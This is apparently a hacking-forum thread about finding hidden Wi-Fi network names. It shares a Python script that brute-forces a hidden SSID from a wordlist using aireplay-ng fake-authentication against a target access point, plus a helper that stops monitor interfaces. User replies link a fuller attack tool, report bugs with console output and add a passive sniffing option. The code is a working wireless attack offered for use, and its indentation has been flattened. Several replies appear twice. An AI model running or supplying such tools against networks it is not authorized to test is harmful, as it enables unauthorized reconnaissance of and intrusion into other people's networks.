I only wrote one of these scripts but did add airmon-ng support to the one I didn't.

The hidden SSID brute force attack is demonstrated in the video below as part of a broader framework.

Skip ahead to 2:44 for the hidden SSID demo.
Sorry there is no awesome music to jam out to.
http://vimeo.com/31786626 Comments on video will be appreciated

The script parts (not the frameword) are below... (I just started messing around with Python so this is an experiment)

Might be useful to someone
Kill all monitor interfaces


#!/usr/bin/python

import subprocess
import sys, binascii, re
from subprocess import Popen, PIPE

# read the file /proc/net/dev
f = open('/proc/net/dev','r')

# write to list
ifacelist = f.read().split('\n')

# close the file
f.close()

# remove first 2 lines
ifacelist.pop(0)
ifacelist.pop(0)

for line in ifacelist:

ifacedata = line.replace(' ','').split(':')

# narrow down selection
if len(ifacedata) == 2:

# verify interface is up
if int(ifacedata[1]) > 0:

# find iface (add list function)
string = ifacedata[0]
if string in ('mon0', 'mon1', 'mon2', 'mon3', 'mon4', 'ath0', 'ath1'):
print '\nmonitor interface found - Putting it down'
for temp in ifacedata:
subprocess.call(["airmon-ng", "stop", temp])


brute hidden ssid script


#!/usr/bin/python


# script created by Tony 'albatr0ss' Di Bernardo, October 2011
# you are free to re-use the code as long as you give credit to the author in you works

import subprocess
import sys, binascii, re
from subprocess import Popen, PIPE

class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'

def disable(self):
self.HEADER = ''
self.OKBLUE = ''
self.OKGREEN = ''
self.WARNING = ''
self.FAIL = ''
self.ENDC = ''

if (len(sys.argv) < 3):
print 'Usage: ' + sys.argv[0] + ' bssid essid_list channel interface'
sys.exit(-1)

bssid = sys.argv[1]
essid_list = sys.argv[2]
channel = sys.argv[3]
interface = sys.argv[4]


subprocess.call(["airmon-ng", "start", interface, channel])

print 'Searching name for Access Point ' + bssid + ' using file ' + essid_list

f = open(essid_list, 'r')

for temp in f:
essid = re.sub(r'\W+','', temp)
print 'Trying Essid: ' + essid
c = Popen(['aireplay-ng', '--fakeauth', '0', '-T 1','-a', bssid, '-e', essid, 'mon0'], stdout=PIPE)
output = c.stdout.read()

finalresult = output.split('\n')[6]

if finalresult.find('Association successful') != -1 :
print bcolors.WARNING + '\nFound! Access Point ' + bssid + ' Essid is ' + essid + bcolors.ENDC
subprocess.call(["airmon-ng", "stop", "mon0",])
sys.exit(0)

print bcolors.FAIL + '\nEssid not in file ' + essid_list + ' for Access Point ' + bssid + bcolors.ENDC

hi,
great!!!!, thanks for your works :)

How do I save the script. can i save it in notepad (windows) as brute.ph?

Cool idea, I went ahead and added on a couple other things I though may be useful to this concept.

One thing you will need for mine to work is fully install airdrop-ng, follow the README in the tar.gz in order to do that. It is pretty simple.

hiddenSSID-Finder: info-s3curity.com/80211/hiddenSSID.tar.gz

Thanks for the idea, Only took a couple hours on this so let me know if you find bugs.

Cool idea, I went ahead and added on a couple other things I though may be useful to this concept.

One thing you will need for mine to work is fully install airdrop-ng, follow the README in the tar.gz in order to do that. It is pretty simple.

hiddenSSID-Finder: info-s3curity.com/80211/hiddenSSID.tar.gz

Thanks for the idea, Only took a couple hours on this so let me know if you find bugs.

I found some time to look at this. I see what your going for. Good idea.

first bug


Enter your choice: 1
[!] Attack Status: Scanning for hidden access points..
Script Error: local variable 'essidParse2' referenced before assignment


fixed that by pushing lines 140 and 143 forward but then it loop forever without putting the device in monitor mode


[!] Attack Status: Scanning for hidden access points..
[!] Attack Status: Scanning for hidden access points..
[!] Attack Status: Scanning for hidden access points..
^C[~] SSID Finder - Exiting with elegance...

Got this for both attack mode 1 and 3

Onto mode 2 and 4 I got this on 2


Enter your choice: 2
Enter target BSSID(MAC): 00:00:00:00:00:00
Enter target channel: 1
[!] Attack Status: Checking Access Point Packets: 00:00:00:00:00:00
Attack Success: Found Hidden SSID: @ 00:00:00:00:00:00

Outputting Cracked Hidden SSIDs...
Hidden SSID: @ 00:00:00:00:00:00

I am sure the ESSID is in the list. I assume its supposed to reveal itself after the "Hidden SSID:" part.

in mode 4 it skipped over the ESSID - It was the second on in the list. but it did list it during the attack.

I will help you troubleshoot this more later when I have extra time (if that exists) and would like to include this tool in my arsenal.

Another idea was to find a way to improve the speed of the brute force somehow. Maybe throw all the packets out quickly and parse the .csv file when its done. This takes forever the way it is now.

One thing that causes issues with the brute force idea is if the hidden network is WPA, aireplay-ng fakeauth can not always associate to it even if you specify the correct ESSID. Oddly enough, It worked on one of my access points running WPA but not the second one running WPA, both with the exact same encryption type.

After trying to figure out a way to do that manually, I'm not sure its really possible with aireplay's output. I think increasing the bruteforce speed may be difficult, I thought about using the "-q" option with aireplay fakeauth which would shorten the keep-alive time, but it could sacrifice stablity.

Let me know if you disable WPA if it still skips over the ESSID.


UPDATE: I fixed both the bugs mentioned above as well as a couple others. Same download link.

where can i download the script itself

ah very nice.

I added this as a passive attack to number 5 and moved the exit down to 6

os.system('ssidsniff -i %s> /dev/null'%mIface)

I haven't tested it yet but thought I would share the idea.

This would make it a well rounded tool for its purpose.


One thing that causes issues with the brute force idea is if the hidden network is WPA, aireplay-ng fakeauth can not always associate to it even if you specify the correct ESSID. Oddly enough, It worked on one of my access points running WPA but not the second one running WPA, both with the exact same encryption type.

After trying to figure out a way to do that manually, I'm not sure its really possible with aireplay's output. I think increasing the bruteforce speed may be difficult, I thought about using the "-q" option with aireplay fakeauth which would shorten the keep-alive time, but it could sacrifice stablity.

Let me know if you disable WPA if it still skips over the ESSID.


UPDATE: I fixed both the bugs mentioned above as well as a couple others. Same download link.

Cool, Didn't know that existed. I added it like you said.